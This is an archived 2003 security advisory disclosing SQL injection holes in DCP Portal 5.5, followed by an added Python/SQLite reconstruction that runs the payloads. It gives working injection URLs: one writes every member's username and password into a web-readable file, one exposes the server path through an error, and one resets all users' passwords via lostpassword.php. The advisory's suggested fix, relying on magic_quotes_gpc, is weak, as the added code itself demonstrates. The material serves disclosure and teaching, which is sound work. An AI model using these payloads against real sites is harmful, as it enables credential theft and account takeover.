
dcpportal.txt

Posted Oct 1, 2003
Authored by Lifo Fifo | Site hackingzone.org

DCP Portal 5.5 is susceptible to multitudes of SQL injection attacks.

tags | exploit, sql injection
SHA-256 | 4f047b815f0a078df914af5f2b80023f7c43c58e79712d72f8210ace0cbbed7c

From: Lifo Fifo <lifofifo20@yahoo.com>
To: bugtraq@securityfocus.com
Subject: DCP Portal - 5.5 holes

Never run this product with magic_quotes_gpc turned off. (It will not work at all with register_globals turned off.)

None of the files in the product validate their input variables, so they are easy to exploit with SQL injection. For example, to get the username and password of every user, exploit advertiser.php.

Request it like this:

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile 'c:/apache2/htdocs/dcpad.txt

That is for Windows. If the web server is running on *nix, use something like:

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile '/var/www/html/dcpad.txt

In both cases you need the absolute path of the document root. To find it, request the following:

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password='

The stray quote makes the query fail, and the resulting error message shows the path on the server if display_errors is turned on in php.ini.

That's all! Note that the query uses UNION, so the host must be running MySQL 4.0 or later. If it is not running 4.x, no problem, there is another file.

This time it's lostpassword.php.

Request it like this:

http://localhost/dcp/lostpassword.php?action=lost&email=fake' or 1=1--'

This really does some damage: it resets everyone's password. Every user receives as many mails as there are users, and everyone's password ends up being the one sent in the last mail.

I didn't have time to check whether injection is possible through some numeric field. If it is, one can launch select-fish attacks, which would work even when magic_quotes_gpc is on.

Fix: instead of fixing the code, simply turn on magic_quotes_gpc. Otherwise it will take you as long as it took them to write DCP Portal.

-lifofifo
http://www.hackingzone.org/
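The two payloads from the advisory, rebuilt as an added example (Python with SQLite; this is not DCP Portal's own PHP). The query strings in advertiser_login and lost_password are assumptions about how advertiser.php and lostpassword.php build their SQL, chosen so the advisory's payloads behave as it describes; the table and column names (dcp5_members with uid, name, password, surname, job, email) come from the advisory's UNION query; the member rows are constructed sample data. member_by_uid is a hypothetical numeric lookup that illustrates the magic_quotes_gpc caveat raised above, not a claim about DCP Portal. SQLite has no INTO OUTFILE, so the advertiser payload ends in a comment instead of the outfile path, and the backslash escaping of magic_quotes_gpc is stood in for by SQLite's quote doubling.

```python
import sqlite3

# Constructed sample data standing in for the DCP Portal members table;
# the table and column names are the ones the advisory's UNION query uses.
MEMBERS = [
    (1, "alice", "s3cret", "Adams", "admin", "alice@example.org"),
    (2, "bob", "hunter2", "Brown", "editor", "bob@example.org"),
    (3, "carol", "pa55w0rd", "Clark", "member", "carol@example.org"),
]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE dcp5_members (uid INTEGER PRIMARY KEY, name TEXT,"
               " password TEXT, surname TEXT, job TEXT, email TEXT)")
    db.executemany("INSERT INTO dcp5_members VALUES (?,?,?,?,?,?)", MEMBERS)
    return db


def quote_gpc(value):
    """Stand-in for magic_quotes_gpc: seal the string context by escaping
    every quote in the request value. PHP's addslashes emits backslashes
    (MySQL syntax); SQLite only understands doubled quotes, so that is what
    is emitted here. The effect on the query is the same."""
    return value.replace("'", "''")


def advertiser_login(db, username, password, magic_quotes=False):
    """Assumed shape of the advertiser.php login query: request values
    concatenated straight into the SQL, as the advisory's payload implies."""
    if magic_quotes:
        username, password = quote_gpc(username), quote_gpc(password)
    sql = ("SELECT uid, name, password, surname, job, email FROM dcp5_members"
           f" WHERE name='{username}' AND password='{password}'")
    return db.execute(sql).fetchall()


def lost_password(db, email, new_password, magic_quotes=False):
    """Assumed shape of the lostpassword.php reset: every row matching the
    WHERE clause gets the new password and a mail. Returns the (email,
    password) pairs that would be mailed out."""
    if magic_quotes:
        email = quote_gpc(email)
    db.execute(f"UPDATE dcp5_members SET password='{new_password}'"
               f" WHERE email='{email}'")
    rows = db.execute("SELECT email, password FROM dcp5_members"
                      f" WHERE email='{email}'")
    return rows.fetchall()


def member_by_uid(db, uid, magic_quotes=False):
    """Hypothetical numeric lookup, NOT a claim about DCP Portal: shows why a
    numeric context is not protected by magic_quotes_gpc. The payload
    contains no quote, so there is nothing for addslashes to escape."""
    if magic_quotes:
        uid = quote_gpc(uid)
    sql = f"SELECT name, password FROM dcp5_members WHERE uid={uid}"
    return db.execute(sql).fetchall()


def lost_password_fixed(db, email, new_password):
    """The real fix: bound parameters, so the request value never becomes SQL."""
    db.execute("UPDATE dcp5_members SET password=? WHERE email=?",
               (new_password, email))
    return db.execute("SELECT email, password FROM dcp5_members WHERE email=?",
                      (email,)).fetchall()


def demo():
    """Run the advisory's two payloads against the reconstruction."""
    # advertiser.php payload; INTO OUTFILE is MySQL-only, so the query's
    # trailing quote is swallowed by a comment instead of the outfile path
    adv = ("qwe' or 1=1 UNION select uid,name,password,surname,job,email"
           " from dcp5_members --")
    lost = "fake' or 1=1--'"            # verbatim from the advisory
    return {
        "advertiser_dump": advertiser_login(make_db(), "1", adv),
        "advertiser_quoted": advertiser_login(make_db(), "1", adv, magic_quotes=True),
        "lost_all": lost_password(make_db(), lost, "owned"),
        "lost_quoted": lost_password(make_db(), lost, "owned", magic_quotes=True),
        "numeric_quoted": member_by_uid(make_db(), "1 or 1=1", magic_quotes=True),
        "lost_fixed": lost_password_fixed(make_db(), lost, "owned"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {len(rows)} row(s) {rows}")
```

Run as-is: the advertiser dump, the lost-password reset and the numeric case each return every member (the reset with every password set to the attacker's value), while the two runs with quoting on and the parameterized fix return nothing. That is exactly the scope of the advisory's "just turn on magic_quotes_gpc" fix: it closes the string contexts the two payloads abuse and nothing else.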

© 2024 Packet Storm. All rights reserved.